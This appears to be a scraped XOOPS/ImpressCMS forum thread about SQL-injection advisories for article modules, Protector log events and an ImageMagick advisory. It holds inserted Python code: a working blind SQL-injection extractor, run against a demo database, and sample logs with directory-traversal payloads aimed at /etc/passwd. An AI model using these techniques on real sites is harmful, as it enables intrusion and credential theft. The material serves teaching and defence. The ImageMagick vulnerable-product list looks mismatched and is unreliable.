Ah, thanks for that Shine.
I was worried for a while there, as I mentioned I've got many sites running on the latest X and with DJ's Article module.
Thanks again
Thanks for clearing this up Shine.
I am quite sure this vulnerability concerns the module articleS 1.03 from AndyM:
http://support.sirium.net/modules/mydownloads/viewcat.php?cid=2
The alert says:
Xoops All Version -(module)Articles- (file)Article.PHP
modules/articles/article.php
So this does NOT concern DJ's Article module.
I hope this vulnerability isn't in the X core as well as the module, as I've got many sites running on the latest versions of XOOPS.
Perhaps it could be the other article module?
http://xoopsforge.com/modules/wordpress/index.php/get-latest-xoops-modules/
Article: the advanced article management module, could also serve as blog or news management
article 1.00 Final
Could be - wasn't sure if it was "article" or "articles".
David I think he means DJ's Article module?
Thanks Giba - which module is this?
XOOPS Article module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it
Source: http://www.securityfocus.com/bid/28879/references
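The advisory above only says that article.php uses an unsanitised ID in a query and that the injection is "blind". The following is an added example, not the Articles module's code or the published exploit: it shows, against an in-memory SQLite table constructed here, why an integer id concatenated into SQL is enough for boolean-based blind extraction, and what the fix looks like. The table and column names (articles, users, pass), the "published=1" condition and the query shape are all assumptions for the demonstration.

```python
import sqlite3


def setup_db():
    # Constructed sample schema and data; not the real XOOPS tables.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, published INTEGER);
        CREATE TABLE users (uid INTEGER PRIMARY KEY, uname TEXT, pass TEXT);
        INSERT INTO articles VALUES (1, 'Hello world', 1), (2, 'Draft', 0);
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


def fetch_article_vulnerable(conn, raw_id):
    # Hypothetical vulnerable pattern: the raw 'id' request parameter is pasted
    # into the SQL string, so anything after the number becomes part of the query.
    sql = "SELECT title FROM articles WHERE id=" + raw_id + " AND published=1"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def fetch_article_fixed(conn, raw_id):
    # Fix: coerce to an integer (what intval() does in PHP) and bind it as a
    # parameter, so the value can never change the structure of the query.
    try:
        article_id = int(raw_id)
    except (TypeError, ValueError):
        return None
    row = conn.execute(
        "SELECT title FROM articles WHERE id=? AND published=1", (article_id,)
    ).fetchone()
    return row[0] if row else None


def blind_extract(fetch, conn, uid=1, max_len=32):
    # Boolean-based blind extraction. The only signal is whether the article is
    # returned or not; each probe asks "is character <pos> of the password > mid?"
    # and a binary search over the ASCII range recovers one character in ~7 requests.
    recovered = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            payload = (
                f"1 AND (SELECT unicode(substr(pass,{pos},1)) "
                f"FROM users WHERE uid={uid}) > {mid}"
            )
            if fetch(conn, payload) is not None:
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break  # substr() past the end is '', unicode('') is NULL: no more characters
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    db = setup_db()
    print("vulnerable:", blind_extract(fetch_article_vulnerable, db))
    print("fixed:     ", repr(blind_extract(fetch_article_fixed, db)))
```

Against the vulnerable fetch the loop walks the whole password hash out of the users table one character at a time, without ever seeing a database error or a query result; against the fixed fetch every probe is rejected by int() and nothing is recovered. Note that casting alone is sufficient only because the parameter is numeric; for string parameters the bound-parameter part of the fix is the one that matters.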
XOOPS Recette is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Recette 2.2 is vulnerable to this issue; other versions may also be affected.
Quote:
Bugtraq ID: 28859
Class: Input Validation Error
CVE:
Remote: Yes
Local: No
Published: Apr 19 2008 12:00AM
Updated: Apr 21 2008 06:17PM
Credit: S@BUN
Vulnerable: Xoops Recette 2.2
I'm seeing a lot of stuff similar to the above and more in protector logs across a couple of sites, starting from 12 April. Anyone finding stuff like this in their logs? (see picture, Protector won't let me post all the bad stuff here :)
Quote:
I mean this one, because I've never seen it on Protector. At the end of the log there is a pwd!
Does this mean that the attacker has access to my site?
The DoS report might not be malicious. Bear that in mind :)
You can get a log of a DoS attack with Protector when you refresh the page too many times, or if you get your password wrong and post again too quickly; it can log that as a DoS event. But that's not a reason to dismiss the DoS. It's still advisable to investigate the source IP of the log entry to determine whether it was an intentional DoS attack or just an overzealous user.
You'll do better checking the server logs and comparing them to the Protector logs. It's more likely that a proper malicious DoS attack would be detected and stopped by the server's firewall.
Quote:
skenow wrote:
DIRECTORY TRAVERSAL - definitely an attempt to find a server vulnerability and read password or configuration files, or find folders/files that are world writable
You have several different events, each with different severities -
CRAWLER - often a result of search bots crawling and indexing your site, but also can be someone copying your site. I often see this associated with Firefox users because FF has a prefetch 'feature' that scans the current page for links and begins to cache the linked pages.
DIRECTORY TRAVERSAL - definitely an attempt to find a server vulnerability and read password or configuration files, or find folders/files that are world writable
URI SPAM - The usual suspects - spammers trying to get their links on your site. The SPAM POINTS are the number of urls in the POST
DoS (denial of service) - flooding the server with requests in an attempt to bring it down, making your site inaccessible. Wikipedia: Denial of Service
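The event types listed above, and the earlier advice that a DoS entry may just be an overzealous user whose IP should be checked against the server logs, can be turned into a small classifier. The following is an added example and is not Protector's code: it applies those definitions to a few constructed web-server log lines. The log format, the spam-points threshold, the DoS window and request count are all assumptions chosen here, not Protector's actual rules or thresholds.

```python
import re
from collections import defaultdict, deque
from urllib.parse import unquote, unquote_plus

# Assumed thresholds for the demonstration (not Protector's settings).
SPAM_POINT_THRESHOLD = 3      # URI SPAM: number of URLs in a POST body
DOS_MAX_REQUESTS = 10         # DoS: more than this many requests from one IP ...
DOS_WINDOW_SECONDS = 5        # ... inside this many seconds

TRAVERSAL_RE = re.compile(r"(\.\./|\.\.\\)")
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)

# Constructed sample log. Format: "<epoch> <ip> <METHOD> <path> [<post body>]".
# The last 12 lines are one IP hitting the same page twelve times in four seconds.
SAMPLE_LOG = [
    "1000 203.0.113.5 GET /modules/articles/article.php?id=3",
    "1001 203.0.113.5 GET /index.php?file=../../../../etc/passwd",
    "1002 198.51.100.7 POST /modules/newbb/post.php "
    "message=buy+http://a.example/x+http://b.example/y+http://c.example/z",
    "1003 192.0.2.9 GET /index.php?p=%2e%2e%2f%2e%2e%2fmainfile.php",
] + [f"{1010 + i // 3} 192.0.2.44 GET /index.php" for i in range(12)]


def parse_line(line):
    parts = line.split(" ", 4)
    ts, ip, method, path = int(parts[0]), parts[1], parts[2], parts[3]
    body = parts[4] if len(parts) > 4 else ""
    return ts, ip, method, path, body


def classify(lines):
    """Return (event type, source ip, detail) tuples in log order."""
    events = []
    recent = defaultdict(deque)   # ip -> request timestamps inside the DoS window
    dos_flagged = set()
    for line in lines:
        ts, ip, method, path, body = parse_line(line)

        # DIRECTORY TRAVERSAL: decode twice so '%2e%2e%2f' and double-encoded
        # forms are caught, then look for a '..' path step.
        if TRAVERSAL_RE.search(unquote(unquote(path))):
            events.append(("DIRECTORY TRAVERSAL", ip, path))

        # URI SPAM: spam points = number of URLs in the POST body.
        if method == "POST":
            points = len(URL_RE.findall(unquote_plus(body)))
            if points >= SPAM_POINT_THRESHOLD:
                events.append(("URI SPAM", ip, f"spam points={points}"))

        # DoS: sliding window of timestamps per IP; flag the IP once per run.
        window = recent[ip]
        window.append(ts)
        while window and ts - window[0] > DOS_WINDOW_SECONDS:
            window.popleft()
        if len(window) > DOS_MAX_REQUESTS and ip not in dos_flagged:
            dos_flagged.add(ip)
            events.append(("DoS", ip, f"{len(window)} requests in {DOS_WINDOW_SECONDS}s"))
    return events


if __name__ == "__main__":
    for kind, ip, detail in classify(SAMPLE_LOG):
        # The IP is printed deliberately: a DoS hit is only a lead until the
        # same IP is checked in the server logs.
        print(f"{kind:20} {ip:15} {detail}")
```

The DoS rule is the one with false positives by design: twelve requests in four seconds is exactly what a user hammering F5 or retrying a wrong password produces, so the classifier reports the IP rather than deciding intent, and the decision belongs with the server-log comparison described above.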
Hi, today I found a log entry in Protector that I didn't understand. Is it harmful?
I've attached a screenshot.
Reported by: SecurityFocus
ImageMagick is prone to multiple integer-overflow vulnerabilities because it fails to properly validate user-supplied data.
An attacker can exploit these issues to execute arbitrary code in the context of the application. Failed exploit attempts will likely cause denial-of-service conditions.
Vulnerable: XFree86 X11R6 4.3.0.2
XFree86 X11R6 4.3.0.1
XFree86 X11R6 4.3.0
+ MandrakeSoft Corporate Server 3.0 x86_64
+ MandrakeSoft Corporate Server 3.0
+ MandrakeSoft Linux Mandrake 10.0 AMD64
+ MandrakeSoft Linux Mandrake 10.0
+ MandrakeSoft Linux Mandrake 9.2 amd64
+ MandrakeSoft Linux Mandrake 9.2
+ MandrakeSoft Linux Mandrake 9.1 ppc
+ MandrakeSoft Linux Mandrake 9.1
+ RedHat Fedora Core1
+ RedHat Linux 9.0 i386
+ Slackware Linux 9.1
+ Slackware Linux 9.0
+ Slackware Linux -current
+ Turbolinux Turbolinux Desktop 10.0
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
X.org X11R7 1.1.1
X.org libx11 1.0
Ubuntu Ubuntu Linux 7.04 sparc
Ubuntu Ubuntu Linux 7.04 powerpc
Ubuntu Ubuntu Linux 7.04 i386
Ubuntu Ubuntu Linux 7.04 amd64
Ubuntu Ubuntu Linux 6.10 sparc
Ubuntu Ubuntu Linux 6.10 powerpc
Ubuntu Ubuntu Linux 6.10 i386
Ubuntu Ubuntu Linux 6.10 amd64
Ubuntu Ubuntu Linux 6.06 LTS sparc
Ubuntu Ubuntu Linux 6.06 LTS powerpc
Ubuntu Ubuntu Linux 6.06 LTS i386
Ubuntu Ubuntu Linux 6.06 LTS amd64
Turbolinux wizpy 0
Turbolinux Turbolinux Server 10.0
Turbolinux Turbolinux Server 10.0.0 x64
Turbolinux Turbolinux Desktop 10.0
Turbolinux Turbolinux FUJI
Turbolinux Turbolinux 10 F...
TurboLinux Personal
TurboLinux Multimedia
Turbolinux FUJI 0
TransSoft Broker FTP Server 8.0
Sun Solaris 10.0 _x86
Sun Solaris 10.0
Sun Solaris 9_x86
Sun Solaris 9
Sun Solaris 8_x86
Sun Solaris 8
SGI ProPack 3.0 SP6
S.u.S.E. UnitedLinux 1.0
S.u.S.E. SuSE Linux Standard Server 8.0
S.u.S.E. SuSE Linux School Server for i386
S.u.S.E. SUSE LINUX Retail Solution 8.0
S.u.S.E. SuSE Linux Openexchange Server 4.0
S.u.S.E. SUSE Linux Enterprise Server 9 SP3
S.u.S.E. SUSE Linux Enterprise Server 10
S.u.S.E. SUSE Linux Enterprise Desktop 10
S.u.S.E. SLE SDK 9
S.u.S.E. SLE SDK 10
S.u.S.E. openSUSE 10.3
S.u.S.E. openSUSE 10.2
S.u.S.E. Open-Enterprise-Server 9.0
S.u.S.E. Open-Enterprise-Server 1
S.u.S.E. Open-Enterprise-Server 0
S.u.S.E. Novell Linux POS 9
S.u.S.E. Novell Linux Desktop 1.0
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 10.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 10.2 x86_64
S.u.S.E. Linux Professional 10.2
S.u.S.E. Linux Professional 10.1
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 10.2 x86_64
S.u.S.E. Linux Personal 10.2
S.u.S.E. Linux Personal 10.1
S.u.S.E. Linux Enterprise Server SDK 9
S.u.S.E. Linux Enterprise Server 9-SP3
+ Linux kernel 2.6.5
S.u.S.E. Linux Enterprise Server 10
+ Linux kernel 2.6.5
S.u.S.E. Linux Enterprise SDK 10
S.u.S.E. Linux Desktop 10
S.u.S.E. Linux 9.3 x86-64
S.u.S.E. Linux 9.3 x86
S.u.S.E. Linux 10.1 x86-64
S.u.S.E. Linux 10.1 x86
S.u.S.E. Linux 10.1 ppc
S.u.S.E. Linux 10.0 x86-64
S.u.S.E. Linux 10.0 x86
S.u.S.E. Linux 10.0 ppc
rPath rPath Linux 1
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux WS 2.1 IA64
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux ES 2.1 IA64
RedHat Enterprise Linux ES 2.1
RedHat Enterprise Linux Desktop Workstation 5 client
RedHat Enterprise Linux Desktop 5 client
RedHat Enterprise Linux AS 4
RedHat Enterprise Linux AS 3
RedHat Enterprise Linux AS 2.1 IA64
RedHat Enterprise Linux AS 2.1
RedHat Enterprise Linux 5 server
RedHat Desktop 4.0
RedHat Desktop 3.0
RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
RedHat Advanced Workstation for the Itanium Processor 2.1
Pardus Linux 2007.1
OpenBSD OpenBSD 4.0
OpenBSD OpenBSD 3.9
MandrakeSoft Linux Mandrake 2007.1 x86_64
MandrakeSoft Linux Mandrake 2007.1
MandrakeSoft Linux Mandrake 2007.0 x86_64
MandrakeSoft Linux Mandrake 2007.0
MandrakeSoft Corporate Server 4.0 x86_64
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
MandrakeSoft Corporate Server 4.0
ImageMagick ImageMagick 6.3.3-3
ImageMagick ImageMagick 6.3.2
ImageMagick ImageMagick 6.3.1
ImageMagick ImageMagick 6.2.9
Gentoo Linux
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
Debian Linux 4.0 sparc
Debian Linux 4.0 s/390
Debian Linux 4.0 powerpc
Debian Linux 4.0 mipsel
Debian Linux 4.0 mips
Debian Linux 4.0 m68k
Debian Linux 4.0 ia-64
Debian Linux 4.0 ia-32
Debian Linux 4.0 hppa
Debian Linux 4.0 arm
Debian Linux 4.0 amd64
Debian Linux 4.0 alpha
Debian Linux 4.0
Avaya Messaging Storage Server MSS 3.0
Avaya Messaging Storage Server
Avaya Message Networking MN 3.1
Avaya Message Networking
Avaya Interactive Response 1.3
Avaya Interactive Response 2.0
Avaya Integrated Management 2.1
Avaya Integrated Management
Avaya CMS Server 13.0
Avaya CMS Server 12.0
Avaya CMS Server 11.0
Avaya CMS Server 9.0
Avaya CMS Server 14.0
Avaya CMS Server 13.1
Apple Safari 3.0.3
Apple Safari 3.0.2 Beta for Windows
Apple Safari 3.0.1 Beta for Windows
Apple Safari 3 Beta for Windows
There were no real issues from my side, I re-uploaded all the files to ensure they were done correctly, then installed it again and it worked straight out of the box.
The mainfile.php originally showed as being blank before I installed.
I believe taritrott is using some kind of web-browser FTP; not sure if this caused some complications.
There was also another folder with ImpressCMS in it, which was not the web root (one above). It's possible he could have been uploading there rather than to the web root where the main ImpressCMS was meant to be.
Thanks Tom,
What was the problem? How can we improve our installation script to avoid this kind of problem?